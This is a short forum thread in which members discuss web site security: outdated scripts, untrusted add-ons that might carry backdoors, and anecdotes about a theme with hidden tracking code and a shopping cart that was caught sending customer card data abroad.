Web site security

[JhnStcks]

Found this interesting article from the prestashop forums and thought it might be a good read for some of you.

I'm sure Scotserve will have some comments to make on it.

http://www.smashingmagazine.com/2010/01/14/web-security-primer-are-you-part-of-the-problem/

[Baa]

Good read, I'll have to look a good few of those up  thanks for the article.

[scotserve]

Excellent article however things are not always as easy as they seem as clients expect certain facilities and security by its very nature can intrude.

The only secure computer is one that is not plugged in.

Outdated scripts are by far the most common problem, people install shopping carts, forums and lots of different scripts and never update leaving the possibility of security holes.

Another issue from the client side is the "patching" and "add ons" found on forums, some of these are huge security risks and how can you trust the integrity of the developer, this is a major concern on open source scripts all a hacker needs to do is create a "must have add on" and install a back door giving access to every site that install the add on- ok pretty simplistic view but how many of you check the coding or indeed understand the coding of a patch you install from another forum or elsewhere. Also included here is the good intentions of someone helping get something to work, security is highly unlikely to be on the agenda.

Home security is even worse - with many people using free virus scanners also I see many people installing the likes of xampp on their home machines without realising that is turning their machine into an internet connected web server even fewer understand how to configure a firewall, a friend of mine a few years back refused to install a virus scanner saying " why i wont be storing anything on the computer" within 3 days he had 360 trojans, his machine was slowed to a snails pace cause of all the spam emails being sent via his computer, remember most hackers are not interested in what on the machine they are only interested in gaining access to control the machine turning it into a zombie computer attached to a spam network.

[Zola de Cwtchi]

Yikes!

Im all paranoid and itchy now...lovely read for a sunday morning in bed, im going to put lappy down and turn over and go back to sleep!!

All these nightmare scenarios...ignorance is bliss 

[JhnStcks]

Another issue from the client side is the "patching" and "add ons" found on forums, some of these are huge security risks and how can you trust the integrity of the developer, this is a major concern on open source scripts all a hacker needs to do is create a "must have add on" and install a back door giving access to every site that install the add on- ok pretty simplistic view but how many of you check the coding or indeed understand the coding of a patch you install from another forum or elsewhere. Also included here is the good intentions of someone helping get something to work, security is highly unlikely to be on the agenda.

I always have a look through coding on prestashop modules, but thats because I am interested in how they are built and how they work.

When i first started using prestashop i downloaded a theme and suddenly started getting traffic from an unknown website.  After investigating the site, it was the theme developers site.  Wondering how they knew I was using the theme, i had a look through their coding and they had inserted a tracking code into the theme.  It only tracked which sites were using their theme, but it could have been a lot worse.

[scotserve]

Another issue from the client side is the "patching" and "add ons" found on forums, some of these are huge security risks and how can you trust the integrity of the developer, this is a major concern on open source scripts all a hacker needs to do is create a "must have add on" and install a back door giving access to every site that install the add on- ok pretty simplistic view but how many of you check the coding or indeed understand the coding of a patch you install from another forum or elsewhere. Also included here is the good intentions of someone helping get something to work, security is highly unlikely to be on the agenda.

I always have a look through coding on prestashop modules, but thats because I am interested in how they are built and how they work.

When i first started using prestashop i downloaded a theme and suddenly started getting traffic from an unknown website.  After investigating the site, it was the theme developers site.  Wondering how they knew I was using the theme, i had a look through their coding and they had inserted a tracking code into the theme.  It only tracked which sites were using their theme, but it could have been a lot worse.

Around 9 years ago we had a client who had a shopping cart built in India, we were responsible for the hosting and installation and while installing the cart we noted that there was outgoing traffic when there should not have been, basically after investigation we found that the cart was farming off all client details including credit card info and personal information and sending it to an IP in India - luckily it was caught before the site went live, that site cost of £3k at the time to have built.
You make a valid point though John, while in your case it was only a tracker it just goes to show what can and will be inserted for the unwary